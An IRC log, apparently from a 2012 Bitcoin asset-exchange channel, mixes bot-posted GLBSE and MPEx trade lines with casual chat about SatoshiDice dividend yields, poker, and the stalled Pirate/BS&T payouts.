[FPGAMINING] 59 @ 0.95 = 56.05 BTC [+] Aug 27 00:41:56 [GLBSE] [MOORE] 9 @ 0.5 = 4.5 BTC [-] Aug 27 00:42:24 [GLBSE] [GIGAMINING] 50 @ 0.959 = 47.95 BTC [-] Aug 27 00:42:26 [GLBSE] [GIGAMINING] 30 @ 0.96 = 28.8 BTC [+] Aug 27 00:44:02 [GLBSE] [ASICMINER] 54 @ 0.086 = 4.644 BTC [-] Aug 27 00:48:48 You know, I like how evoorhees doesn't use more than 1 confirmation Aug 27 00:48:53 yet he doesn't get scammed Aug 27 00:51:32 it's because he uses your bet transaction as one of the inputs to send back funds Aug 27 00:51:43 so if your initial transaction goes invalid, so does the payout Aug 27 00:52:08 Oooo Aug 27 00:52:12 you have no incentive. Aug 27 00:52:16 So it only works in his instance. Aug 27 00:52:20 Gotcha. Aug 27 00:52:22 yeah Aug 27 00:52:50 [GLBSE] [NYAN] 1 @ 0.9999 BTC [-] Aug 27 00:53:02 [GLBSE] [COGNITIVE] 7 @ 0.6799 = 4.7593 BTC [+] Aug 27 00:53:18 [GLBSE] [BIF.5-10.MININGBOND] 1 @ 0.55 BTC [+] Aug 27 00:55:40 [GLBSE] [BITCOINRS] 3 @ 0.05099 = 0.153 BTC [-] Aug 27 00:55:46 [MPEX] [S.MPOE] 10024 @ 0.00038311 = 3.8403 BTC [-] Aug 27 00:55:49 [GLBSE] [BDK.BND] 10 @ 0.10099999 = 1.01 BTC [-] Aug 27 00:56:59 [GLBSE] [GSDPT] 7 @ 0.0034 = 0.0238 BTC [+] Aug 27 00:57:03 [GLBSE] [BDK.BND] 90 @ 0.10099999 = 9.09 BTC [-] Aug 27 00:57:53 I withdraw money from GLBSE Aug 27 00:57:57 Change my mind Aug 27 00:58:03 Put it back on Aug 27 00:58:06 wait forever Aug 27 00:58:11 and wonder what the hell is wrong with me Aug 27 00:59:08 [MPEX] [S.MPOE] 12200 @ 0.00038373 = 4.6815 BTC [+] Aug 27 00:59:41 [GLBSE] [OBSI.HRPT] 2 @ 0.103 = 0.206 BTC [+] Aug 27 00:59:44 don't change your mind Aug 27 01:07:44 [MPEX] [S.MPOE] 6100 @ 0.00038658 = 2.3581 BTC [+] Aug 27 01:10:24 EmanuelDeOrtega, what? Aug 27 01:10:31 Put that money to work Aug 27 01:10:51 or loan it to me for 0.5% weekly eh Aug 27 01:11:23 >Ortega Aug 27 01:11:25 lol BTC-Mining Aug 27 01:11:37 sorry about the a Aug 27 01:11:42 It's very common. Aug 27 01:11:47 It finds itself everywhere. Aug 27 01:15:14 BTC-Minina is right. Aug 27 01:15:59 I... see what you did there? Aug 27 01:16:21 :p Aug 27 01:18:38 Okay, I made a deposit and 11 confirmations later, nothing. Aug 27 01:19:12 Go on withdraw/deposit page... Aug 27 01:19:20 and click on check for deposit Aug 27 01:19:46 Nothing unfortunately Aug 27 01:19:52 that's not uncommon Aug 27 01:20:02 Good. Aug 27 01:20:10 yeah, have no fear Aug 27 01:20:29 If it shows up tonight, that's good enough. Aug 27 01:20:31 I always get my money on time... Aug 27 01:20:31 is glbse manual too ? Aug 27 01:20:34 my personal high is 15 conf, iirc Aug 27 01:20:39 no, it's not manual Aug 27 01:24:06 [GLBSE] [GSDPT] 1000 @ 0.0034 = 3.4 BTC [+] Aug 27 01:27:38 [GLBSE] [TYGRR.BOND-P] 1 @ 0.4001 BTC [-] Aug 27 01:27:48 [GLBSE] [GSDPT] 10000 @ 0.0034 = 34 BTC [+] Aug 27 01:27:53 [GLBSE] [TYGRR.BOND-P] 1 @ 0.4 BTC [-] Aug 27 01:28:11 [GLBSE] [GSDPT] 5000 @ 0.0034 = 17 BTC [+] Aug 27 01:28:30 [GLBSE] [GSDPT] 1000 @ 0.0034 = 3.4 BTC [+] Aug 27 01:28:42 [GLBSE] [PUREMINING] 1 @ 0.0798 BTC [-] Aug 27 01:28:50 [GLBSE] [GSDPT] 500 @ 0.0034 = 1.7 BTC [+] Aug 27 01:28:52 [GLBSE] [GSDPT] 12 @ 0.0034 = 0.0408 BTC [+] Aug 27 01:29:35 [GLBSE] [PUREMINING] 35 @ 0.08 = 2.8 BTC [+] Aug 27 01:29:40 [GLBSE] [OBSI.HRPT] 7 @ 0.103 = 0.721 BTC [+] Aug 27 01:29:43 Well, if anyone what's the scraps of GDSPT come and get'em Aug 27 01:30:06 did it run out of asks again ? Aug 27 01:30:18 [GLBSE] [OBSI.HRPT] 58 @ 0.103 = 5.974 BTC [+] Aug 27 01:30:25 [GLBSE] [GSDPT] 100 @ 0.0034 = 0.34 BTC [+] Aug 27 01:30:41 ;;later tell deadterra almost out of asks on gsdpt again Aug 27 01:30:42 The operation succeeded. Aug 27 01:30:48 It's getting there soon Aug 27 01:31:25 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [+] Aug 27 01:31:26 .py 6222 * 0.0034 Aug 27 01:31:26 21.1548 Aug 27 01:31:35 ya almost gone Aug 27 01:31:41 [GLBSE] [YABMC] 10 @ 0.1345 = 1.345 BTC [+] Aug 27 01:31:59 If Meni gets bot up for POLY.10.1 I'll buy the rest Aug 27 01:32:02 his* Aug 27 01:32:12 but he probably won't so *shrug* Aug 27 01:32:37 waht is poly.10. Aug 27 01:32:38 [GLBSE] [ASICMINER] 4 @ 0.08967999 = 0.3587 BTC [+] Aug 27 01:32:48 err, you know what i meant Aug 27 01:32:57 Basically a Bitcoin long Aug 27 01:33:18 is it better than buying a call? Aug 27 01:33:25 Nope, not really Aug 27 01:33:41 [GLBSE] [TYGRR.BOND-P] 1 @ 0.3901 BTC [-] Aug 27 01:33:42 [GLBSE] [TYGRR.BOND-P] 1 @ 0.39 BTC [-] Aug 27 01:33:44 [GLBSE] [TYGRR.BOND-P] 1 @ 0.38 BTC [-] Aug 27 01:33:45 [GLBSE] [TYGRR.BOND-P] 1 @ 0.37 BTC [-] Aug 27 01:33:46 [GLBSE] [TYGRR.BOND-P] 1 @ 0.36 BTC [-] Aug 27 01:33:46 [GLBSE] [TYGRR.BOND-P] 1 @ 0.35 BTC [-] Aug 27 01:33:47 [GLBSE] [TYGRR.BOND-P] 1 @ 0.34 BTC [-] Aug 27 01:33:48 [GLBSE] [TYGRR.BOND-P] 14 @ 0.33001137 = 4.6202 BTC [-] Aug 27 01:33:49 [GLBSE] [TYGRR.BOND-P] 4 @ 0.33 = 1.32 BTC [-] Aug 27 01:34:06 smickles it's some bizzare/useless wannabe-option thing Aug 27 01:36:20 I am trying to guess the top on Satoshi Dice but it's hard without a dividend yet Aug 27 01:36:41 It's deflation proof until a certain point Aug 27 01:36:56 and he will have a natural monopoly for some time Aug 27 01:36:56 [MPEX] [S.MPOE] 24176 @ 0.00038311 = 9.2621 BTC [-] Aug 27 01:36:57 [MPEX] [S.MPOE] 9424 @ 0.00038248 = 3.6045 BTC [-] Aug 27 01:37:00 unless he goes full retard Aug 27 01:37:38 [GLBSE] [YABMC] 21 @ 0.1349 = 2.8329 BTC [+] Aug 27 01:38:23 i doubt voorhees goes retard. Aug 27 01:39:58 [GLBSE] [MERGEDMINING] 10 @ 0.085 = 0.85 BTC [+] Aug 27 01:40:04 ;;ident EmanuelDeOrtego Aug 27 01:40:05 Nick 'EmanuelDeOrtego', with hostmask 'EmanuelDeOrtego!~k@74.196.233.153', is not identified. Aug 27 01:40:09 anyway if the most recent data holds i can see it going to 50 Aug 27 01:40:21 ? Aug 27 01:40:29 50 what? Aug 27 01:40:29 err, do you have a WOT identity EmanuelDeOrtego ? Aug 27 01:40:43 smickles: Used to. Aug 27 01:40:52 I had a 1000 BTC loan on that. Aug 27 01:40:56 its 320k now, 500k. Aug 27 01:40:58 [GLBSE] [BLUECHIP] 1 @ 0.1 BTC Aug 27 01:41:09 I just lost the credentials. Aug 27 01:41:15 Oh, total valuation Aug 27 01:41:31 [GLBSE] [BITNODES] 10 @ 0.2573 = 2.573 BTC [-] Aug 27 01:41:58 as to the issue of the dividend, i think evoorhees did mention total profits month to date Aug 27 01:42:12 [GLBSE] [GSDPT] 3 @ 0.0034 = 0.0102 BTC [+] Aug 27 01:42:21 and that it has already beaten the statistically expected dividend Aug 27 01:42:31 it was up significantly Aug 27 01:42:32 which is about 19% iirc Aug 27 01:43:59 SatoshiDice transactions just keep going up... Aug 27 01:44:00 [GLBSE] [OBSI.HRPT] 2 @ 0.103 = 0.206 BTC [+] Aug 27 01:44:15 Hmmm Aug 27 01:44:23 [GLBSE] [GSDPT] 5000 @ 0.0034 = 17 BTC [+] Aug 27 01:44:39 [GLBSE] [BTCWEB] 1 @ 0.1096 BTC [-] Aug 27 01:44:41 lol where is deadterra! Aug 27 01:44:51 0.0034 all gone almost already Aug 27 01:44:53 Bubble time. Aug 27 01:45:05 [GLBSE] [GSDPT] 1217 @ 0.0034 = 4.1378 BTC [+] Aug 27 01:45:12 yup Aug 27 01:45:13 I wish I had enough money to buy them all. Aug 27 01:45:18 they're gone. Aug 27 01:45:29 I have almost 50k personally Aug 27 01:45:47 o did they even sell that much ?! Aug 27 01:45:52 !ticker GSDPT Aug 27 01:45:54 [GLBSE:GSDPT] [Bid: 0.0033099] [Ask: 0.0035] [Spread: 0.0001901] [Last: 0.0034] [24hVol: 188.8802] [7dAvg: 0.00379333] Aug 27 01:46:02 hmm doesn't say Aug 27 01:46:19 https://glbse.com/api/quantity_trading/GSDPT Aug 27 01:46:26 299525 Aug 27 01:46:29 [GLBSE] [BMMO] 3 @ 0.10974 = 0.3292 BTC [+] Aug 27 01:46:30 300000 total Aug 27 01:46:31 [GLBSE] [OBSI.HRPT] 1 @ 0.103 BTC [+] Aug 27 01:46:33 .py 986.838 / 35 Aug 27 01:46:33 28.1953714286 Aug 27 01:46:40 280k or so it sold huh Aug 27 01:47:00 o ya, cheaper orifginally. i see Aug 27 01:47:28 Let's see if somebody is stupid enough to buy it up to 70 again Aug 27 01:47:30 i wonder how many people have the sense to put bids at 34 Aug 27 01:47:38 as opposed to buy at 35-40-50 etc Aug 27 01:48:08 The other days they were selling at 70 =/ Aug 27 01:48:30 I need to sell when that happens. For some reason I wouldn't doubt it holding there though. Aug 27 01:49:01 People claiming all the dividends in one swift valuation. Aug 27 01:49:21 tbh, irt going to 50 i could see. it going to 70 seems a little rich. Aug 27 01:49:26 maybe next year. Aug 27 01:49:32 That's why dividends are stupid. He should just do share buybacks. Aug 27 01:49:43 EmanuelDeOrtego nobody says he doesn't. Aug 27 01:49:43 We'll see how it goes, also with the new design and all Aug 27 01:49:49 Hmmm Aug 27 01:49:51 Very well Aug 27 01:50:08 entirely within his right to buy up however many shares. Aug 27 01:50:10 [GLBSE] [GOLD] 32 @ 0.00989 = 0.3165 BTC [-] Aug 27 01:51:52 [GLBSE] [PUREMINING] 1 @ 0.08 BTC [+] Aug 27 01:52:32 [GLBSE] [YABMC] 1 @ 0.1349 BTC [+] Aug 27 01:52:39 [GLBSE] [YARR] 4 @ 0.998999 = 3.996 BTC [+] Aug 27 01:53:17 can someone do an independant calc here, i figured the expected dividend per share each month should be 0.00005505 Aug 27 01:54:46 Seems too high Aug 27 01:55:00 What his the net profit each month currently? Aug 27 01:55:05 to be distributed? Aug 27 01:55:34 like 3k ? Aug 27 01:55:38 2,990.69 (expected) Aug 27 01:56:17 so it's 0.00002990 Aug 27 01:56:27 0.000029 per share then it seems Aug 27 01:56:56 A bit under 1% per month or 10% per year, assuming no growth Aug 27 01:57:14 Seems like a traditional company valuation Aug 27 01:57:33 then what is that cedus guy in the forums saying that the forward dividend yeild is 19.15% for? Aug 27 01:57:52 no idea Aug 27 01:58:12 .py .00002990 / .00345 Aug 27 01:58:13 0.00866666666667 Aug 27 01:58:37 .py (.00002990 / .00345) * 12 Aug 27 01:58:37 0.104 Aug 27 01:59:04 [GLBSE] [OBSI.HRPT] 50 @ 0.1029 = 5.145 BTC [-] Aug 27 01:59:49 oh Aug 27 02:00:19 they claim that 19 based on the past 30 days performance as of their posting on the 24th Aug 27 02:00:27 yeah Aug 27 02:00:30 it went up this month Aug 27 02:00:43 [GLBSE] [FPGAMINING] 2 @ 0.95 = 1.9 BTC [+] Aug 27 02:01:33 .py ((6506.96/100000000)/.00345)*12 Aug 27 02:01:34 0.226329043478 Aug 27 02:02:01 myea. Aug 27 02:02:04 so 22% now Aug 27 02:02:14 [GLBSE] [PPT.A] 18 @ 0.5 = 9 BTC [-] Aug 27 02:02:18 may be. Aug 27 02:02:21 [GLBSE] [NYAN.C] 10 @ 0.7 = 7 BTC [+] Aug 27 02:02:32 but that is a bad number to look at, Aug 27 02:02:47 forward div yeild based on one good month Aug 27 02:03:18 we should either use the statistical expectation, or the alltime actual data Aug 27 02:03:51 yeah. Aug 27 02:03:59 tho... if it's booming it's booming. Aug 27 02:04:25 just variance tho, like a red streak in roulette Aug 27 02:05:08 [GLBSE] [NYAN.C] 10 @ 0.7 = 7 BTC [+] Aug 27 02:05:41 nah cause their actual bids are up significantly. Aug 27 02:05:56 and variance was actually under before. Aug 27 02:06:36 [GLBSE] [OBSI.HRPT] 20 @ 0.103 = 2.06 BTC [+] Aug 27 02:06:52 [GLBSE] [YABMC] 1 @ 0.1349 BTC [+] Aug 27 02:06:54 [GLBSE] [YABMC] 9 @ 0.135 = 1.215 BTC [+] Aug 27 02:07:16 course, if we had a year's worth of data. but there's pretty much 4 months of which prolly the first is meaningless anyway. Aug 27 02:07:56 [GLBSE] [ASICMINER] 8 @ 0.08967999 = 0.7174 BTC [+] Aug 27 02:07:58 [GLBSE] [ASICMINER] 12 @ 0.08977999 = 1.0774 BTC [+] Aug 27 02:10:07 still, a 10% yeild is damn good Aug 27 02:10:46 imo, for this sort of venture Aug 27 02:11:31 well, some say too low some say pretty good... Aug 27 02:11:33 it's a market. Aug 27 02:12:11 mircea_popescu: does mpex have to capability to do share based dividends, rather than cash? Aug 27 02:12:26 what sense would that make ? Aug 27 02:12:45 some companies do it Aug 27 02:12:57 so if some companies jumped in the river... Aug 27 02:13:23 it makes some investors feel like they get more, and it makes the companies feel like they pleased their envestors for no cost Aug 27 02:13:33 *investors Aug 27 02:13:39 at most there could be splitting if the prices get out of hand Aug 27 02:15:46 .py ((7,083.12/100000000)/.00345)*12 Aug 27 02:15:47 TypeError: unsupported operand type(s) for /: 'tuple' and 'float' Aug 27 02:15:52 .py ((7083.12/100000000)/.00345)*12 Aug 27 02:15:53 0.246369391304 Aug 27 02:16:09 lol Aug 27 02:16:09 i had the wrong number for august's profit Aug 27 02:16:14 myea. Aug 27 02:16:16 [MPEX] [S.MPOE] 36693 @ 0.00038432 = 14.1019 BTC [+] Aug 27 02:16:21 it could be uber sweet, is the thing. we see. Aug 27 02:16:24 "it just keeps going up" Aug 27 02:16:48 i suppose we'll see how well evoorhees can keep it up Aug 27 02:17:08 harr harr Aug 27 02:17:18 august pays no dividends to stock. september could be -500 btc Aug 27 02:17:22 i mean you never know. Aug 27 02:17:48 [GLBSE] [FPGA.CONTRACT] 100 @ 0.05 = 5 BTC [-] Aug 27 02:17:50 [GLBSE] [PUREMINING] 1 @ 0.08 BTC [+] Aug 27 02:17:56 aww, that's too bad Aug 27 02:18:06 i would've liked a nice quick payoff Aug 27 02:18:11 :p Aug 27 02:18:18 There's still the Speculative value Aug 27 02:18:32 it would've pleased my 'merican sensibilities Aug 27 02:19:18 june was -2k Aug 27 02:20:11 i think that was on old rake. Aug 27 02:20:20 lol, i remember this, but it's entertaining to go over it againg Aug 27 02:20:29 so june starts out up ~2k Aug 27 02:20:34 then day by day Aug 27 02:20:40 1: -131 Aug 27 02:20:43 2: -177 Aug 27 02:20:51 [GLBSE] [DMC] 9 @ 0.068 = 0.612 BTC [+] Aug 27 02:20:53 3: - 640 Aug 27 02:21:00 4: -1031 Aug 27 02:21:03 so i get 2-2 and flop shows a 2 Aug 27 02:21:06 5: - 784 Aug 27 02:21:07 everyone's bidding like crazy Aug 27 02:21:24 so on day 6, he's lost all profit Aug 27 02:21:36 6: + 150 Aug 27 02:21:44 7: -510 Aug 27 02:22:26 from there he slowly recovers tho via ebb and flow Aug 27 02:22:29 that was a sweet 4 btc lol Aug 27 02:22:56 mircea_popescu: seals? Aug 27 02:23:02 yeah Aug 27 02:23:24 [GLBSE] [GSDPT] 1 @ 0.0035 BTC [+] Aug 27 02:23:26 hmm, i think i still have about 2 btc there Aug 27 02:23:30 [GLBSE] [ASICMINER] 4 @ 0.08977999 = 0.3591 BTC [+] Aug 27 02:23:43 [GLBSE] [FUTUREFUND] 10 @ 0.00012189 = 0.0012 BTC [+] Aug 27 02:23:45 clearly, you are playing above my tolerances tho Aug 27 02:23:47 Who buys 1 share of GSDPT? Aug 27 02:24:05 srsly. Aug 27 02:24:15 smickles 300/500 Aug 27 02:24:39 maybe i'll join as see how long i'll last Aug 27 02:24:48 Ahh fuck all I have is .0035 after that transaction fee, I think ill buy 1 GSDPT with it sweet! Aug 27 02:25:09 but then, maybe my mouse will quit again Aug 27 02:25:24 they're noobs tho, dun kno how to play this game. Aug 27 02:27:03 So what is Satoshi Dice's current valuation? Aug 27 02:28:04 340k btc Aug 27 02:28:50 or thereabouts Aug 27 02:31:53 just wiped a guy. kkk here 888 there. 11k Aug 27 02:33:50 [GLBSE] [OBSI.HRPT] 1 @ 0.103 BTC [+] Aug 27 02:34:39 oh my Aug 27 02:35:04 im +20k past 30 mins. Aug 27 02:35:15 [GLBSE] [OBSI.1MHS] 10 @ 0.08 = 0.8 BTC [-] Aug 27 02:35:17 [GLBSE] [OBSI.1MHS] 25 @ 0.071 = 1.775 BTC [-] Aug 27 02:35:18 [GLBSE] [OBSI.1MHS] 100 @ 0.071 = 7.1 BTC [-] Aug 27 02:35:27 which you know... i didnt know you could play pro poker in btc Aug 27 02:35:34 [GLBSE] [KRAKEN] 4 @ 0.01 = 0.04 BTC Aug 27 02:35:46 i'm up 1.5%, i should just stop now Aug 27 02:35:54 [GLBSE] [ASICMINER] 1 @ 0.08977999 BTC [+] Aug 27 02:35:58 [GLBSE] [ASICMINER] 67 @ 0.08977999 = 6.0153 BTC [+] Aug 27 02:36:00 [GLBSE] [ASICMINER] 33 @ 0.08978 = 2.9627 BTC [+] Aug 27 02:37:13 [GLBSE] [PUREMINING] 3 @ 0.08 = 0.24 BTC [+] Aug 27 02:38:27 [GLBSE] [PUREMINING] 1 @ 0.08 BTC [+] Aug 27 02:40:18 ack, 5/4 off suit Aug 27 02:40:45 [GLBSE] [OBSI.HRPT] 1 @ 0.103 BTC [+] Aug 27 02:42:45 [GLBSE] [ASICMINER] 2 @ 0.08978 = 0.1796 BTC [+] Aug 27 02:43:04 [GLBSE] [ASICMINER] 1 @ 0.08978 BTC [+] Aug 27 02:43:06 [GLBSE] [OBSI.HRPT] 197 @ 0.103 = 20.291 BTC [+] Aug 27 02:43:50 "4.2. This contract is the sole and complete agreement between the parties. It may not be modified by third parties, irrespective if said parties should style themselves "court of law", "judge" or otherwise. " Aug 27 02:43:56 Wow, just wow. Haha. Aug 27 02:44:46 that's my favorite section Aug 27 02:46:15 Which asset is that? Aug 27 02:46:51 Satoshi Dice Aug 27 02:47:07 EmanuelDeOrtego ;) Aug 27 02:47:30 philosophy is good, practice is better still. Aug 27 02:47:33 [GLBSE] [PUREMINING] 20 @ 0.08 = 1.6 BTC [+] Aug 27 02:48:03 I want to imagine a judge reading that Aug 27 02:48:04 wow, just won a pot about as large as the max buy in with highcard Aug 27 02:48:17 Where? Aug 27 02:48:38 puddle Aug 27 02:48:44 er Aug 27 02:48:45 pond Aug 27 02:50:22 [MPEX] [F.GIGA.ETF] 5100 @ 0.00103479 = 5.2774 BTC [+] Aug 27 02:52:27 [GLBSE] [OBSI.HRPT] 9 @ 0.104 = 0.936 BTC [+] Aug 27 02:52:58 [GLBSE] [OBSI.HRPT] 1 @ 0.104 BTC [+] Aug 27 02:53:02 [GLBSE] [TYGRR.BOND-P] 1 @ 0.33021337 BTC [+] Aug 27 02:53:05 [MPEX] [S.MPOE] 7646 @ 0.00038248 = 2.9244 BTC [-] Aug 27 02:53:12 [GLBSE] [FOO.PPPPT] 2 @ 0.3511 = 0.7022 BTC [-] Aug 27 02:53:32 [GLBSE] [BIB.PIRATE] 2 @ 0.3391 = 0.6782 BTC [-] Aug 27 02:54:00 [GLBSE] [TYGRR.BOND-P] 16 @ 0.33011337 = 5.2818 BTC [-] Aug 27 02:54:30 [GLBSE] [BIB.PIRATE] 20 @ 0.339 = 6.78 BTC [-] Aug 27 02:55:07 [GLBSE] [TYGRR.BOND-P] 15 @ 0.33 = 4.95 BTC [-] Aug 27 02:55:35 [GLBSE] [HYDRO.BONDS] 2 @ 1.57 = 3.14 BTC [-] Aug 27 02:55:48 [GLBSE] [OBSI.HRPT] 2 @ 0.10211 = 0.2042 BTC [-] Aug 27 02:58:39 [GLBSE] [GSDPT] 25 @ 0.0035 = 0.0875 BTC [+] Aug 27 02:59:03 [GLBSE] [OBSI.HRPT] 1 @ 0.102 BTC [-] Aug 27 02:59:11 [GLBSE] [FOO.PPPPT] 1 @ 0.49 BTC [+] Aug 27 03:00:38 [GLBSE] [TYGRR.BOND-P] 46 @ 0.33 = 15.18 BTC [-] Aug 27 03:00:39 [GLBSE] [TYGRR.BOND-P] 1 @ 0.33 BTC [-] Aug 27 03:00:41 [GLBSE] [TYGRR.BOND-P] 1 @ 0.32 BTC [-] Aug 27 03:00:42 [GLBSE] [TYGRR.BOND-P] 1 @ 0.31 BTC [-] Aug 27 03:00:43 [GLBSE] [TYGRR.BOND-P] 74 @ 0.300001 = 22.2001 BTC [-] Aug 27 03:00:44 [GLBSE] [TYGRR.BOND-P] 44 @ 0.3 = 13.2 BTC [-] Aug 27 03:02:15 [GLBSE] [TYGRR.BOND-P] 1 @ 0.39 BTC [+] Aug 27 03:03:40 Aug 27 03:04:08 where do you guys play poker? Aug 27 03:05:25 sealswithclubs.eu is where most people seem to play Aug 27 03:05:47 I suck at poker Aug 27 03:06:04 I just bleed money, even in the puddle Aug 27 03:06:30 lol, pirate appaears and TYGRR.BOND-P rallies :) Aug 27 03:07:22 :) Aug 27 03:08:00 Rally? Aug 27 03:08:14 that looks like a selloff at first Aug 27 03:08:41 again? lol Aug 27 03:08:50 [20:06] <+Gladamas> I'd just like to say, I never expected all this madness when I shutdown BS&T. It's been a lot more work than I could have even thought and I simply messed up. In hindsight, I shouldn't have stopped things so suddenly. Although it was nice to finally get some sleep, things have been spiraling out of control this week and pushing my personal deadlines. Aug 27 03:08:50 [20:06] <+Gladamas> At this point and in an attempt to stop the bleeding (interest) I'm going to be forced to payout everyone at once, which I'm sure will piss off enough people to counter the lack of payouts but I don't see any other way of handling this. Aug 27 03:08:52 moar excuses and promises ? Aug 27 03:09:07 yeah, my bad, only looked at the last few trades Aug 27 03:09:14 if you want to put it that way mircea Aug 27 03:09:26 I dunno, I hope that means hes going to payout Aug 27 03:09:52 [GLBSE] [ASICMINER] 417 @ 0.08978 = 37.4383 BTC [+] Aug 27 03:09:54 [GLBSE] [ASICMINER] 907 @ 0.089799 = 81.4477 BTC [+] Aug 27 03:10:14 I'm going to be forced to pay everyone out at once... Aug 27 03:10:19 Whenever the market collapses. Aug 27 03:10:22 which I'm sure will piss off enough people << who's it gonna piss off ? Aug 27 03:10:45 They are going to be pissed off because it will be a long time until he pays out. Aug 27 03:10:54 lol Aug 27 03:10:58 everyone at once, in 2055 Aug 27 03:11:01 to cut down interest payments would it not be faster to pay off people when he had coin, and not just wiat until he had it all? Aug 27 03:11:08 let's face it, he can't pay in the indefinite future. Aug 27 03:11:19 btc is going up, he;s a two bit hustler. Aug 27 03:11:21 or simply stop interest when he shut down the operations Aug 27 03:11:47 he's not stopping interest. you don't understand how scams work Aug 27 03:11:51 gotta give people shit to mull over. Aug 27 03:11:55 [MPEX] [O.BTCUSD.P120T] 1000 @ 0.1826746 = 182.6746 BTC [+] Aug 27 03:12:04 mmkay. Aug 27 03:12:16 saying he'll release all at once might be an attempt to bring the btc price down Aug 27 03:12:33 yaya. Aug 27 03:13:38 scumbag dude. pays 11 people worth 500btc total Aug 27 03:13:44 announces he will pauy "all at once" Aug 27 03:14:08 MoneyisDebt: Bingo. Aug 27 03:14:36 It's becoming more and more obvious that he doesn't have the BTC. Aug 27 03:14:46 first time I think he's sounded uncertain... Aug 27 03:15:14 [GLBSE] [TYGRR.BOND-P] 3 @ 0.3899 = 1.1697 BTC [-] Aug 27 03:16:07 [GLBSE] [FOO.PPPPT] 2 @ 0.4999 = 0.9998 BTC [+] Aug 27 03:16:08 [GLBSE] [FOO.PPPPT] 5 @ 0.5 = 2.5 BTC [+] Aug 27 03:16:22 seems the market is not moving on the news though Aug 27 03:16:33 its mixed news Aug 27 03:16:42 and it's nothing really new Aug 27 03:16:44 [GLBSE] [TYGRR.BOND-P] 7 @ 0.465 = 3.255 BTC [+] Aug 27 03:16:45 [GLBSE] [FOO.PPPPT] 2 @ 0.3512 = 0.7024 BTC [-] Aug 27 03:16:46 same status Aug 27 03:16:47 no timelines Aug 27 03:16:53 [GLBSE] [TYGRR.BOND-P] 26 @ 0.465 = 12.09 BTC [+] Aug 27 03:17:13 [GLBSE] [TYGRR.BOND-P] 3 @ 0.3 = 0.9 BTC [-] Aug 27 03:17:34 [GLBSE] [BIB.PIRATE] 2 @ 0.3391 = 0.6782 BTC [+] Aug 27 03:17:36 no timeline Aug 27 03:17:41 maybe the real news is that he has no market influence any more Aug 27 03:17:41 and a payout all at once.. very odd Aug 27 03:17:55 [GLBSE] [BIB.PIRATE] 19 @ 0.339 = 6.441 BTC [-] Aug 27 03:18:00 nothing new, excuses, no timeline... Aug 27 03:18:08 "uneventful" Aug 27 03:18:19 [GLBSE] [BIB.PIRATE] 12 @ 0.338 = 4.056 BTC [-] Aug 27 03:18:36 It makes no sense to keep interest going, say those interests are bleeding him, and the fix to be paying everyone all at once... Aug 27 03:19:01 BTC-Mining scams work by not making sense. Aug 27 03:19:03 Instead of individually, as soon as possible Aug 27 03:19:19 How can not making sense work?! Aug 27 03:19:45 how can it not work at this point Aug 27 03:19:48 what news lol. Aug 27 03:19:56 pirate is last week's news. he didn't happen. moving on. Aug 27 03:20:05 His influence has dried up completely. Aug 27 03:20:09 Since when is senseless things better to invest in then senseful ones? Aug 27 03:20:11 The market won't budge for him anymore. Aug 27 03:20:16 like one of those one hit bands. Aug 27 03:20:42 [MPEX] [S.MPOE] 11091 @ 0.00038432 = 4.2625 BTC [+] Aug 27 03:20:42 BTC-Mining scams appeal to the irrational part of people. Aug 27 03:20:43 [MPEX] [S.MPOE] 30296 @ 0.00038435 = 11.6443 BTC [+] Aug 27 03:21:14 creo quia absurdum est. Aug 27 03:21:21 oldest scam in the book, xtianity. Aug 27 03:21:40 actually, i would say pirate's influence has increased Aug 27 03:21:55 now that MNW's bid has capped Aug 27 03:22:31 why? Aug 27 03:22:43 Matthew's bet only says he has a 50/50 chance of paying out. Aug 27 03:22:48 that wright muppet makes bids now ? Aug 27 03:23:01 50/50? Aug 27 03:23:28 1:1 Aug 27 03:23:34 $100k on each side Aug 27 03:23:44 EmanuelDeOrtego: he originally felt that odds were in his favor Aug 27 03:23:55 EmanuelDeOrtego: I think it went down to 50% as the bids came in Aug 27 03:24:02 and he had conversations Aug 27 03:24:12 http://www.betsofbitco.in/item?id=566 o hey, somebody bid Aug 27 03:24:26 pirate statement over? Aug 27 03:24:35 mircea_popescu: if I was a hacker, I would bet for myself Aug 27 03:24:45 mircea_popescu: if I was confident enough Aug 27 03:25:02 i imagine that was a just in case bet. Aug 27 03:25:29 im kind of amused tho, for all the hordes of forum idiots that whine about mpex Aug 27 03:25:42 I still wonder if the delay is related to LR being down. Aug 27 03:25:43 that the best they came up with is 1 btc which actually was there from before their finding out the world exists. Aug 27 03:25:48 mircea_popescu: would you still pay someone who compromised MPEX AND caused damages? Aug 27 03:25:54 or only if they didn't touch anything? :P Aug 27 03:26:09 1.337 ? sure lol. Aug 27 03:26:19 what exactly would he damage tho. Aug 27 03:26:32 all your date? Aug 27 03:26:35 data* Aug 27 03:26:37 make the page say "Mircea Popescu sux!!" Aug 27 03:27:06 damages Aug 27 03:27:07 in general Aug 27 03:27:09 no, he would add a word after sux. Aug 27 03:27:22 Mircea Popescu sux eggs!!! Aug 27 03:27:55 Mircea Popescu is a scam artist and has a small penis. Aug 27 03:27:58 foolproof Aug 27 03:28:07 aaaiiarrriiigght Aug 27 03:28:12 please don't smoke teh cock Aug 27 03:28:15 it bothers the artiste Aug 27 03:28:24 you guise ever saw man on the moon ? Aug 27 03:29:23 [GLBSE] [BIB.PIRATE] 2 @ 0.33510001 = 0.6702 BTC [-] Aug 27 03:29:24 [GLBSE] [BIB.PIRATE] 135 @ 0.33500001 = 45.225 BTC [-] Aug 27 03:29:25 [GLBSE] [BIB.PIRATE] 19 @ 0.333 = 6.327 BTC [-] Aug 27 03:29:26 [GLBSE] [BIB.PIRATE] 10 @ 0.32 = 3.2 BTC [-] Aug 27 03:29:51 !topic Aug 27 03:32:05 How would a business hedge a large number of coins, say 100k usd worth, so that they wouldn't have to worry about btc price rising Aug 27 03:32:14 [GLBSE] [FOO.PPPPT] 2 @ 0.3501 = 0.7002 BTC [-] Aug 27 03:32:16 [GLBSE] [FOO.PPPPT] 6 @ 0.35 = 2.1 BTC [-] Aug 27 03:32:46 is it even feasible to do this for an extended period of time? Aug 27 03:33:22 [GLBSE] [BLUECHIP] 14 @ 0.1 = 1.4 BTC Aug 27 03:33:47 ;;topic Aug 27 03:33:47 Bitcoin asset exchanges: GLBSE https://glbse.com || MPEx http://polimedia.us/mpex || CST https://cryptostocks.com || ICBIT https://icbit.se || list bot commands: !help || Streaming trades only: #bitcoin-assets-trades || a biased message: http://smpake.com/ || Net Chart: http://bit.ly/RMjqah Aug 27 03:33:56 [MPEX] 